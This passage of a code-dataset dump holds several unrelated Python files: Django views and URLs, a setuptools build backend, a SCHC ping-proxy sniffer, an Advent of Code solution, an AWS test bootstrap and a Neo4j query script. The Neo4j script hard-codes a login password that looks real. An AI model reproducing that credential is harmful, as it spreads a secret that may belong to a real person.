build_editable\")\n logger.debug(f\"wheel_directory: {wheel_directory}\")\n # If not invoked indirectly by cxbuild itself do the default action\n if not os.environ.get('CBX_ACTIVITY'):\n return build_meta.build_editable(wheel_directory, config_settings, metadata_directory)\n return build_wheel(wheel_directory, config_settings, metadata_directory)\n\n\ndef get_requires_for_build_sdist(\n config_settings: dict[str, str | list[str]] | None = None # noqa: ARG001\n) -> list[str]:\n logger.debug(\"Build hook: get_requires_for_build_sdist\")\n return build_meta.get_requires_for_build_sdist(config_settings)\n\n\ndef get_requires_for_build_wheel(\n config_settings: Mapping[str, Any] | None = None\n) -> list[str]:\n logger.debug(\"Build hook: get_requires_for_build_wheel\")\n #return []\n return build_meta.get_requires_for_build_wheel(config_settings)\n\n\ndef get_requires_for_build_editable(self, config_settings=None):\n logger.debug(\"Build hook: get_requires_for_build_editable\")\n return get_requires_for_build_wheel(config_settings)\n\n\ndef prepare_metadata_for_build_wheel(\n metadata_directory: str,\n config_settings: dict[str, list[str] | str] | None = None,\n) -> str:\n logger.debug(\"Build hook: prepare_metadata_for_build_wheel\")\n return build_meta.prepare_metadata_for_build_wheel(\n metadata_directory, config_settings\n )\n\n\ndef prepare_metadata_for_build_editable(metadata_directory, config_settings=None):\n logger.debug(\"Build hook: build_editable\")\n return build_meta.prepare_metadata_for_build_wheel(\n metadata_directory, config_settings\n )\n", "repo_name": "crungelab/cxbuild", "sub_path": "cxbuild/backend.py", "file_name": "backend.py", "file_ext": "py", "file_size_in_byte": 2998, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "loguru.logger.debug", "line_number": 37, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 37, "usage_type": "name"}, {"api_name": "setuptools.build_meta.build_sdist", "line_number": 38, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 38, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 46, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 46, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 47, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 47, "usage_type": "name"}, {"api_name": "project.Project", "line_number": 48, "usage_type": "call"}, {"api_name": "pathlib.Path.cwd", "line_number": 48, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 48, "usage_type": "name"}, {"api_name": "project.build_wheel", "line_number": 49, "usage_type": "call"}, {"api_name": "loguru.logger.debug", "line_number": 57, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 57, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 58, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 58, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 60, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 60, "usage_type": "attribute"}, {"api_name": "setuptools.build_meta.build_editable", "line_number": 61, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 61, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 68, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 68, "usage_type": "name"}, {"api_name": "setuptools.build_meta.get_requires_for_build_sdist", "line_number": 69, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 69, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 73, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 75, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 75, "usage_type": "name"}, {"api_name": "setuptools.build_meta.get_requires_for_build_wheel", "line_number": 77, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 77, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 81, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 81, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 89, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 89, "usage_type": "name"}, {"api_name": "setuptools.build_meta.prepare_metadata_for_build_wheel", "line_number": 90, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 90, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 96, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 96, "usage_type": "name"}, {"api_name": "setuptools.build_meta.prepare_metadata_for_build_wheel", "line_number": 97, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 97, "usage_type": "name"}]} +{"seq_id": "713246750", "text": "from django.http import HttpResponse\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom django.http import Http404\nfrom .serializers import ReceitaSerializer\nfrom .models import Receita\nfrom rest_framework import status\n\ndef index(request):\n return HttpResponse(\"Olá mundo! Este é o app notes de Tecnologias Web do Insper.\")\n\n# GET\n@api_view(['GET', 'POST', 'DELETE'])\ndef api_receita(request, receita_id):\n try:\n receita = Receita.objects.get(id=receita_id)\n except Receita.DoesNotExist:\n raise Http404()\n\n if request.method == 'POST':\n new_receita_data = request.data\n receita.title = new_receita_data['title']\n receita.content = new_receita_data['ingredients']\n receita.content = new_receita_data['preparo']\n receita.save()\n\n\n if request.method == 'DELETE':\n receita.delete()\n return Response(status.HTTP_204_NO_CONTENT)\n\n serialized_receita = ReceitaSerializer(receita)\n return Response(serialized_receita.data)\n\n\n#\n@api_view(['GET','POST'])\ndef api_receita_list(request):\n\n if request.method == \"POST\":\n new_receita_data = request.data\n receita = Receita()\n receita.title = new_receita_data['title']\n receita.ingredients = new_receita_data['ingredients']\n receita.preparo = new_receita_data['preparo']\n receita.save()\n\n receitas = Receita.objects.all()\n serialized_receitas = ReceitaSerializer(receitas, many=True)\n return Response(serialized_receitas.data)\n\n", "repo_name": "rodrigonigri/TecWeb-Projeto3-backend", "sub_path": "receita/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1550, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.http.HttpResponse", "line_number": 10, "usage_type": "call"}, {"api_name": "models.Receita.objects.get", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Receita.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.Receita", "line_number": 16, "usage_type": "name"}, {"api_name": "models.Receita.DoesNotExist", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.Receita", "line_number": 17, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 18, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 30, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_204_NO_CONTENT", "line_number": 30, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 30, "usage_type": "name"}, {"api_name": "serializers.ReceitaSerializer", "line_number": 32, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 33, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Receita", "line_number": 42, "usage_type": "call"}, {"api_name": "models.Receita.objects.all", "line_number": 48, "usage_type": "call"}, {"api_name": "models.Receita.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "models.Receita", "line_number": 48, "usage_type": "name"}, {"api_name": "serializers.ReceitaSerializer", "line_number": 49, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 50, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "28507254755", "text": "from setuptools import find_packages, setup\n\nwith open(\"README.md\", \"r\") as file:\n readme = file.read()\n file.close()\n\nwith open(\"CHANGELOG.md\", \"r\") as file:\n readme += \"\\n\\n\"\n readme += file.read()\n file.close()\n\nsetup(\n name=\"aiodown\",\n version=\"1.0.7\",\n packages=find_packages(),\n install_requires=[\n \"async-files >= 0.4\",\n \"httpx[http2] >= 0.20\",\n \"humanize >= 3.2.0\",\n ],\n url=\"https://github.com/AmanoTeam/aiodown\",\n python_requires=\">=3.8\",\n author=\"AmanoTeam\",\n author_email=\"contact@amanoteam.com\",\n license=\"MIT\",\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: Implementation\",\n \"Programming Language :: Python :: Implementation :: CPython\",\n \"Programming Language :: Python :: Implementation :: PyPy\",\n \"Topic :: Internet\",\n ],\n description=\"A fully async file downloader with httpx\",\n download_url=\"https://github.com/AmanoTeam/aiodown/releases/latest\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n keywords=\"python, downloader, async, asyncio, httpx, file\",\n project_urls={\n \"Bug report\": \"https://github.com/AmanoTeam/aiodown/issues\",\n \"Donate\": \"https://liberapay.com/AmanoTeam\",\n \"Source\": \"https://github.com/AmanoTeam/aiodown\",\n },\n)\n", "repo_name": "AmanoTeam/aiodown", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1654, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "setuptools.setup", "line_number": 12, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "32939602732", "text": "from pathlib import Path\n\n\ndef part_1() -> int:\n \"\"\"\n ROCK: A and X\n PAPER: B and Y\n SCISSORS: C and Z\n \"\"\"\n match = {\n \"X\": \"A\",\n \"Y\": \"B\",\n \"Z\": \"C\",\n }\n wins = {\n \"X\": \"C\", # rock beats scissors\n \"Y\": \"A\", # paper beats rock\n \"Z\": \"B\", # scissors beats paper\n }\n\n base_score = {\n \"X\": 1,\n \"Y\": 2,\n \"Z\": 3,\n }\n with open(Path(__file__).parent / \"input.txt\") as file:\n total_score = 0\n for line in file:\n line = line.strip()\n p1, p2 = line.split(\" \")\n if match[p2] == p1:\n total_score += 3 + base_score[p2]\n print(\"draw\")\n elif wins[p2] == p1:\n total_score += 6 + base_score[p2]\n print(\"win\")\n else:\n total_score += base_score[p2]\n print(\"loss\")\n return total_score\n\n\ndef part_2() -> int:\n \"\"\"\n ROCK: A and X\n PAPER: B and Y\n SCISSORS: C and Z\n \"\"\"\n loser_hands = {\n \"A\": \"C\", # rock beats scissors\n \"B\": \"A\", # paper beats rock\n \"C\": \"B\", # scissors beats paper\n }\n winner_hands = {\n \"C\": \"A\", # rock beats scissors\n \"A\": \"B\", # paper beats rock\n \"B\": \"C\", # scissors beats paper\n }\n\n base_score = {\n \"A\": 1,\n \"B\": 2,\n \"C\": 3,\n }\n translate = {\n \"A\": \"rock\",\n \"B\": \"paper\",\n \"C\": \"scissors\",\n }\n with open(Path(__file__).parent / \"input.txt\") as file:\n total_score = 0\n for line in file:\n line = line.strip()\n p1, p2 = line.split(\" \")\n if p2 == \"Z\": # win\n winner_hand = winner_hands[p1]\n total_score += 6 + base_score[winner_hand]\n print(\n f\"must win, pick {translate[winner_hand]} against {translate[p1]}\"\n )\n elif p2 == \"X\": # lose\n loser_hand = loser_hands[p1]\n total_score += 0 + base_score[loser_hand]\n print(\n f\"must lose, pick {translate[loser_hand]} against {translate[p1]}\"\n )\n else: # draw\n total_score += 3 + base_score[p1]\n print(f\"must draw, pick {translate[p1]} against {translate[p1]}\")\n return total_score\n\n\nif __name__ == \"__main__\":\n print(part_1())\n print(part_2())\n", "repo_name": "rbusquet/advent-of-code", "sub_path": "aoc_2022/day02.py", "file_name": "day02.py", "file_ext": "py", "file_size_in_byte": 2461, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pathlib.Path", "line_number": 26, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "23349204010", "text": "import logging\n\nfrom acktest.bootstrapping import Resources, BootstrapFailureException\nfrom acktest.bootstrapping.sqs import Queue\nfrom acktest.bootstrapping.sns import Topic\nfrom acktest.aws.identity import get_region, get_account_id\n\nfrom e2e import bootstrap_directory\nfrom e2e.bootstrap_resources import BootstrapResources\n\ntopic1 = Topic(name_prefix=\"subscribe-topic\")\ntopic2 = Topic(name_prefix=\"adoption-subscribe-topic\")\n\nqueue_policy = \"\"\"{\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"Service\": \"sns.amazonaws.com\"\n },\n \"Action\": \"sqs:SendMessage\",\n \"Resource\": \"arn:aws:sqs:$REGION:$ACCOUNT_ID:$NAME\",\n \"Condition\": {\n \"ArnEquals\": {\n \"aws:SourceArn\": \"arn:aws:sns:$REGION:$ACCOUNT_ID:$TOPIC_NAME\"\n }\n }\n }\n ]\n}\n\"\"\"\n\nqueue1_policy_vars = {\n \"$TOPIC_NAME\": topic1.name,\n}\n\nqueue2_policy_vars = {\n \"$TOPIC_NAME\": topic2.name,\n}\n\ndef service_bootstrap() -> Resources:\n logging.getLogger().setLevel(logging.INFO)\n\n resources = BootstrapResources(\n Topic1=topic1,\n Topic2=topic2,\n Queue1=Queue(\n name_prefix=\"subscribe-queue\",\n policy=queue_policy,\n policy_vars=queue1_policy_vars,\n ),\n Queue2=Queue(\n name_prefix=\"adoption-subscribe-queue\",\n policy=queue_policy,\n policy_vars=queue2_policy_vars,\n ),\n )\n\n try:\n resources.bootstrap()\n except BootstrapFailureException as ex:\n exit(254)\n\n return resources\n\nif __name__ == \"__main__\":\n config = service_bootstrap()\n # Write config to current directory by default\n config.serialize(bootstrap_directory)\n", "repo_name": "aws-controllers-k8s/sns-controller", "sub_path": "test/e2e/service_bootstrap.py", "file_name": "service_bootstrap.py", "file_ext": "py", "file_size_in_byte": 1696, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "acktest.bootstrapping.sns.Topic", "line_number": 11, "usage_type": "call"}, {"api_name": "acktest.bootstrapping.sns.Topic", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 42, "usage_type": "attribute"}, {"api_name": "e2e.bootstrap_resources.BootstrapResources", "line_number": 44, "usage_type": "call"}, {"api_name": "acktest.bootstrapping.sqs.Queue", "line_number": 47, "usage_type": "call"}, {"api_name": "acktest.bootstrapping.sqs.Queue", "line_number": 52, "usage_type": "call"}, {"api_name": "acktest.bootstrapping.BootstrapFailureException", "line_number": 61, "usage_type": "name"}, {"api_name": "acktest.bootstrapping.Resources", "line_number": 41, "usage_type": "name"}, {"api_name": "e2e.bootstrap_directory", "line_number": 69, "usage_type": "argument"}]} +{"seq_id": "337553348", "text": "import os\nimport sys\nsys.path.insert(0, '../..')\nimport binascii\nimport pprint\n\n# ----- SCHC ------\n\n\nfrom gen_rulemanager import *\nfrom compr_parser import *\nfrom gen_utils import dprint, dpprint\n\n\n# ----- scapy -----\n\nfrom kamene.all import *\n\nimport ipaddress\n\nclass debug_protocol:\n def _log(*arg):\n dprint(*arg)\n\nP = Parser(debug_protocol)\nRM = RuleManager()\n\ndef AnalyzePkt(packet):\n global RM\n \n dprint(len(packet), \"\".join([\"%02x\"%_ for _ in bytes(packet)]))\n\n withoutL2 = bytes(packet)\n\n print (\"\".join([\"%02x\"%_ for _ in withoutL2]))\n try:\n fields, data = P.parse(withoutL2, direction=T_DIR_DW)\n except:\n print (\"not a parsable packet\")\n return\n \n dpprint(fields)\n dprint(data)\n \n rule,dev_id = RM.FindRuleFromPacket(fields, direction=T_DIR_DW)\n pprint.pprint (rule)\n\n if rule == None:\n return\n \n if \"Action\" in rule:\n if rule[T_ACTION] == T_ACTION_PPING:\n print (\"proxy ping\")\n\n print (hex(fields[(T_IPV6_DEV_PREFIX, 1)][0]))\n print (hex(fields[(T_IPV6_DEV_IID, 1)][0]))\n print (hex(fields[(T_IPV6_APP_PREFIX, 1)][0]))\n print (hex(fields[(T_IPV6_APP_IID, 1)][0]))\n\n IPv6Src = (fields[(T_IPV6_DEV_PREFIX, 1)][0]<< 64) + fields[(T_IPV6_DEV_IID, 1)][0]\n IPv6Dst = (fields[(T_IPV6_APP_PREFIX, 1)][0]<< 64) + fields[(T_IPV6_APP_IID, 1)][0]\n\n\n IPv6SrcStr = ipaddress.IPv6Address(IPv6Src)\n IPv6DstStr = ipaddress.IPv6Address(IPv6Dst)\n\n IPv6Header = IPv6 (\n version = fields[(T_IPV6_VER, 1)][0],\n tc = fields[(T_IPV6_TC, 1)][0],\n fl = fields[(T_IPV6_FL, 1)][0],\n nh = fields[(T_IPV6_NXT, 1)][0],\n hlim = 30,\n src = IPv6SrcStr.compressed,\n dst = IPv6DstStr.compressed\n )\n\n txt = \"SCHC device is alive\"\n\n Echo = ICMPv6EchoReply(\n id = fields[(T_ICMPV6_IDENT, 1)][0],\n seq = fields[(T_ICMPV6_SEQNB, 1)][0],\n data = data\n #data = txt.encode() + data[len(txt):]\n )\n\n myMessage = IPv6Header / Echo\n myMessage.show()\n send (myMessage, iface=\"he-ipv6\")\n else:\n pass #should compresss\n \nif __name__ == '__main__':\n\n print (sys.argv)\n\n RM = RuleManager()\n RM.Add(file=\"example/comp-rule-100.json\")\n\n sniff (filter=\"ip6\", prn=AnalyzePkt, iface=\"he-ipv6\")\n", "repo_name": "openschc/openschc", "sub_path": "src/net_compression.py", "file_name": "net_compression.py", "file_ext": "py", "file_size_in_byte": 2561, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 24, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.insert", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "gen_utils.dprint", "line_number": 23, "usage_type": "call"}, {"api_name": "gen_utils.dprint", "line_number": 31, "usage_type": "call"}, {"api_name": "gen_utils.dpprint", "line_number": 42, "usage_type": "call"}, {"api_name": "gen_utils.dprint", "line_number": 43, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 46, "usage_type": "call"}, {"api_name": "ipaddress.IPv6Address", "line_number": 64, "usage_type": "call"}, {"api_name": "ipaddress.IPv6Address", "line_number": 65, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 94, "usage_type": "attribute"}]} +{"seq_id": "8116064835", "text": "from py2neo import Graph\r\n\r\ng = Graph(\"http://localhost:7474\", username=\"neo4j\", password=\"cooperck890303\")\r\nnum_limit = 20\r\n\r\n\r\nprint(1)\r\nqueries = [\"MATCH (m:project)-[r:contains_unit]->(n:unit) where m.id = '{0}' RETURN m.name, r.name, n.name, n.id\".format('DX-01')]\r\nprint(queries)\r\nanswers = []\r\nress = g.run(queries[0]).data()\r\nprint(ress)\r\nanswers += ress\r\nprint(answers)\r\n# unit_id = answers[0]['n.id']\r\n# print('unit_id',unit_id)\r\nprocess_id=[] # 存储流程id\r\nfor i in answers:\r\n sql_1 = [\"MATCH (a:unit)-[b:water_flow]->(c:unit) where c.id = '{0}' RETURN a.id\".format(i['n.id'])]\r\n print(sql_1)\r\n ress_1 = g.run(sql_1[0]).data() # [{'a.id':XXX}]\r\n if len(ress_1) == 0:\r\n break\r\n#print(i['n.id'])\r\nprocess_id.append(i['n.id'])#输入第一个单元的id\r\n#print(process_id)\r\na = process_id[0]\r\nfor j in answers:\r\n sql_2 = [\"MATCH (a:unit)-[b:water_flow]->(c:unit) where a.id = '{0}' RETURN c.id\".format(a)]\r\n print(sql_2)\r\n ress_2 = g.run(sql_2[0]).data()#[{'c.id':XXX}]\r\n if len(ress_2) ==0:\r\n break\r\n b=ress_2[0]['c.id']\r\n process_id.append(b)\r\n a=b\r\nprint(process_id) #得��按顺序的单元id\r\n# 下面找出单元id对应的单元名称\r\nprocess_name=[]\r\nfor k in process_id:\r\n sql_3 = [\"MATCH (a:unit) where a.id = '{0}' RETURN a.name\".format(k)]\r\n ress_3 = g.run(sql_3[0]).data() # [{'a.name':XXX}]\r\n n=ress_3[0]['a.name']\r\n process_name.append(n)\r\nprint(process_name)\r\nx='工艺流程为:{0}'.format('-->'.join(list(set(process_name))))\r\nprint(x)", "repo_name": "cooperck/QA_ReuseWater_KG", "sub_path": "test03.py", "file_name": "test03.py", "file_ext": "py", "file_size_in_byte": 1530, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "py2neo.Graph", "line_number": 3, "usage_type": "call"}]} +{"seq_id": "74516053609", "text": "from django.urls import path\nfrom django.contrib.auth import views as auth_views\n\n\nfrom imdb_api.views.main import frontpage, dashboard, admin_dashboard\nfrom imdb_api.views.signup import signup\nfrom imdb_api.views.login_view import login_view, logout_view\nfrom imdb_api.views.movies_view import (\n all_movies, new_movies, movie_details_with_trailers,\n movie_details, movie_search, base_genre_movies, genre_movies, dash_movie_search, genre_list\n )\nfrom imdb_api.views.movie_serializer_view import MovieView\nfrom imdb_api.views.genre_serializer_view import GenresView\nfrom imdb_api.views.user_recommendations import user_recommendations\n\nfrom imdb_api.views.admin_panel_view import AdminView\nfrom imdb_api.views.user_panel_view import vote_for_movie, toggle_favorite, user_update_profile, CommentView\n\n\napp_name = \"imdb\"\nurlpatterns = [\n path(\"\", frontpage, name='frontpage'),\n\n # path for user dashboard\n path(\"dashboard/\", dashboard, name='dashboard'),\n path('movie_search/', movie_search, name='movie_search'),\n path('dash_movie/', dash_movie_search, name='dash_movie_search'),\n path('user_update_profile/', user_update_profile, name='user_update_profile'),\n \n # path for admin dashboard\n path('admin_dashboard/', admin_dashboard, name='admin_dashboard'),\n path('update_profile//', AdminView.update_user_profile, name='update_profile'),\n path('see_all_users/', AdminView.see_all_users, name='see_all_users'),\n path(\"delete_user//\", AdminView.delete_user, name=\"del_user\"),\n path('see_all_genres/', AdminView.see_all_genres, name='see_all_genres'),\n path('add_genre/', AdminView.add_genre, name='add_genre'),\n path(\"delete_genre//\", AdminView.delete_genre, name=\"del_genre\"),\n path('see_all_movies/', AdminView.see_all_movies, name='see_all_movies'),\n path('add_movie_not_authomatic/', AdminView.add_movie_not_authomatic, name='add_movie_not_authomatic'),\n path(\"update_movie//\", AdminView.update_movie, name=\"update_movie\"),\n # path for Signup, Login, Logout\n path(\"signup/\", signup, name=\"signup\"),\n path(\"login/\", login_view, name=\"login\"),\n path(\"logout/\", logout_view, name=\"logout\"),\n path('recommendations/', user_recommendations, name='user_recommendations'),\n path('vote_for_movie//', vote_for_movie, name='vote_for_movie'),\n path('toggle_favorite//', toggle_favorite, name='toggle_favorite'),\n\n # path for all movie infos.\n path('all_movies/', all_movies, name='all_movies'),\n path('new_movies', new_movies, name='new_movies'),\n path('movie_details//', movie_details, name='movie_details'),\n path('detail&trailer//', movie_details_with_trailers, name='detail&trailer'),\n path('genre_movies//', genre_movies, name='genre_movies'),\n path('base_genre_movies//', base_genre_movies, name='base_genre_movies'),\n path('genres/', genre_list, name='genre_list'),\n \n # path for comments\n path('comment//', CommentView.as_view(), name='comment'),\n \n # APIs for movies\n path(\"apis/movies/\", MovieView.as_view(), name=\"apis_movies\"),\n path(\"apis/movies//\", MovieView.as_view(), name=\"apis_movies\"),\n # APIs for genres\n path(\"apis/genres/\", GenresView.as_view(), name=\"genres\"),\n path(\"apis/genres//\", GenresView.as_view(), name=\"genre\"),\n \n\n\n]\n\n \n \n\n\n", "repo_name": "MarcinIgna/imdb-django-api", "sub_path": "imdb_api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 3503, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "imdb_api.views.main.frontpage", "line_number": 22, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "imdb_api.views.main.dashboard", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.movie_search", "line_number": 26, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.dash_movie_search", "line_number": 27, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "imdb_api.views.user_panel_view.user_update_profile", "line_number": 28, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "imdb_api.views.main.admin_dashboard", "line_number": 31, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.update_user_profile", "line_number": 32, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 32, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.see_all_users", "line_number": 33, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 33, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.delete_user", "line_number": 34, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 34, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.see_all_genres", "line_number": 35, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 35, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 36, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.add_genre", "line_number": 36, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 36, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 37, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.delete_genre", "line_number": 37, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 37, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 38, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.see_all_movies", "line_number": 38, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 38, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 39, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.add_movie_not_authomatic", "line_number": 39, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 39, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 40, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.update_movie", "line_number": 40, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 40, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 42, "usage_type": "call"}, {"api_name": "imdb_api.views.signup.signup", "line_number": 42, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 43, "usage_type": "call"}, {"api_name": "imdb_api.views.login_view.login_view", "line_number": 43, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 44, "usage_type": "call"}, {"api_name": "imdb_api.views.login_view.logout_view", "line_number": 44, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 45, "usage_type": "call"}, {"api_name": "imdb_api.views.user_recommendations.user_recommendations", "line_number": 45, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 46, "usage_type": "call"}, {"api_name": "imdb_api.views.user_panel_view.vote_for_movie", "line_number": 46, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 47, "usage_type": "call"}, {"api_name": "imdb_api.views.user_panel_view.toggle_favorite", "line_number": 47, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 50, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.all_movies", "line_number": 50, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 51, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.new_movies", "line_number": 51, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 52, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.movie_details", "line_number": 52, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 53, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.movie_details_with_trailers", "line_number": 53, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 54, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.genre_movies", "line_number": 54, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 55, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.base_genre_movies", "line_number": 55, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 56, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.genre_list", "line_number": 56, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 59, "usage_type": "call"}, {"api_name": "imdb_api.views.user_panel_view.CommentView.as_view", "line_number": 59, "usage_type": "call"}, {"api_name": "imdb_api.views.user_panel_view.CommentView", "line_number": 59, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 62, "usage_type": "call"}, {"api_name": "imdb_api.views.movie_serializer_view.MovieView.as_view", "line_number": 62, "usage_type": "call"}, {"api_name": "imdb_api.views.movie_serializer_view.MovieView", "line_number": 62, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 63, "usage_type": "call"}, {"api_name": 